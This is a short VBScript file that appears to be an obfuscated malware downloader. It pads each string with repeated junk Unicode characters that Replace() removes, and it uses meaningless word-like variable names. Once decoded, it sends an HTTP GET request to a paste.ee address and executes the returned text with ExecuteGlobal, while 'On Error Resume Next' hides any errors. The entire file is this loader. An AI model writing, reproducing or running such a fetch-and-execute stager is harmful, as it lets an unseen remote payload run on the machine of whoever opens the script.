

On Error Resume Next

Dim beleaguers, aromochelys, pings, superfamilies, enouncement, proselytization


superfamilies = "MSṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెXML2.SṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెerṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెveṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెrXMLṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెHTTṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెP"
superfamilies = Replace(superfamilies, "Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె", "")


pings = "hṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెtṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెtṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెpṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె:Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె/Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె/Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెpṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెaṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెsṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెtṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెeṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె.Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెeṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెeṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె/Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెdṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె/Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెKṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెgṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెnṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెSṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెRṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెqṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెqṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెbṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె/Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె0"
pings = Replace(pings, "Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె", "")


enouncement = "GṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెEṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెT"
enouncement = Replace(enouncement, "Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె", "")


proselytization = "respoṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెnseṂ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒ҞెText"
proselytization = Replace(proselytization, "Ṃ஗ῆ🧱೟ᥫŷƲᕇᏁ🦀👞🌒Ҟె", "")


Set beleaguers = CreateObject(superfamilies)
beleaguers.Open enouncement, pings, False
beleaguers.Send


aromochelys = Eval("beleaguers." & proselytization)
ExecuteGlobal aromochelys

